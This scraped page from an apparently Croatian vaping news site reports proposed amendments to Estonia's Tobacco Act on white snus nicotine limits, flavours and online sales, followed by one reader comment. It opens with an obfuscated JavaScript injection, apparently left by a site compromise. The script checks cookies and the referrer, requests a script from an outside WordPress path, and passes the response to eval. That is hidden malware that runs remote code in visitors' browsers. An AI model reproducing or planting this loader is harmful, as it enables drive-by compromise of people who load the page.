;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Estonija predlaže izmjene i dopune Zakona o duhanu

Osam estonskih zastupnika podnijelo je novi zakon, koji će, ako bude usvojen, izmijeniti Zakon o duhanu estonskom parlamentu.

Nažalost, Estonija je nedavno bila na trećem mjestu u Europi po broju smrtnih slučajeva povezanih s pušenjem. U skladu s time, sadašnjim prijedlogom zakona predlažu se izmjene i dopune kojima bi se razjasnili propisi koji se odnose na alternativne nikotinske proizvode, s ciljem poticanja sigurnosti i dostupnosti takvih proizvoda te smanjenja stope pušenja.

Zastupnik predlagača zakona Tarmo Kruusimäe rekao je da su prethodne izmjene i dopune Zakona o duhanu ne samo dovele do porasta stope pušenja, već su i nenamjerno stvorile crno tržište u procvatu.

Predložene izmjene i dopune sadržaja nikotina i okusa

Trenutačno predloženim amandmanima bi se uveli propisi o sadržaju nikotina u bijelom snusu (snus bez duhana) i izmijenili postojeći propisi koji se odnose na aromatizirane proizvode i pristup online prodaji.

U priopćenju NNA Estonia amandmani su sažeti na sljedeći način:

“Predloženi propisi će:

  • Postaviti maksimalni sadržaj nikotina u ‘bijelom snusu’ na 25 mg/g i ograničite maksimalnu veličinu vrećice na 1 gram.
  • Zabraniti dodavanje vitamina, kofeina, taurina i drugih aditiva koji potrošačima mogu stvoriti lažni dojam da je ‘bijeli snus’ koristan za zdravlje ili potiče energiju.
  • Isključiti slatke arome iz izbora poput slatkiša, kolača, bezalkoholnih pića itd., koji bi mogli biti privlačni mladima.”

Na sreću, prijedlog zakona predlaže ukidanje trenutne zabrane okusa koja dopušta samo duhan i mentol na tržištu. Prijedlog zakona predlaže proširenje izbora okusa, ali zabranu onih opisanih kao slatkiši, deserti ili bezalkoholna pića.

Online prodaja bi se vratila nakon digitalne identifikacije

Trenutno je zabranjena internetska prodaja sigurnijih nikotinskih alternativa. Zakonom bi se obnovila domaća online prodaja nakon digitalne identifikacije (osobne iskaznice) kako bi se isključila bilo kakva prodaja i dostupnost proizvoda maloljetnicima. NNA je objasnila da je sličan sustav lokalno usvojen za digitalno glasovanje koji se pokazao vrlo sigurnim.

Predložene izmjene i dopune osigurale bi da se slike i ikone koje se odnose na grafiku usmjerenu na djecu, poput crtića, igračaka, likova, deskriptora itd., više ne prikazuju na pakiranjima.

Prikaz e-cigareta i srodnih uređaja koji se koriste za sigurniju upotrebu nikotina trenutno je zabranjen osim u specijaliziranim neovisnim trgovinama. Izmjena bi omogućila općenitim trgovcima da izlože e-cigarete, čime bi odraslim kupcima omogućili da pogledaju raspon dostupnih proizvoda, pomažući im da donesu informirani izbor.

Choose your Reaction!
  • Zanimljivo kako se zbog problema sa klasičnim duhanom odnosno duhanskom industrijom sve prelama na Vapingu kao zdravijoj alternativi istoj.
    Ono, frka je sa cigaretama al’ ajmo udariti po Vapingu. Jasno da treba regulirati i Vaping industriju, pravila moraju postojati i Vaping industrija mora i treba biti regulirana, ali nakon stoljeća divljanja duhanske industrije ovo mi djeluje licemjerno. Sve dok države ubiru značajna sredstva od prodaje klasičnih duhanskih proizvoda neće biti tu ozbiljnijeg pomaka u korist Vapinga nasuprot duhanske industrije.

Leave a Comment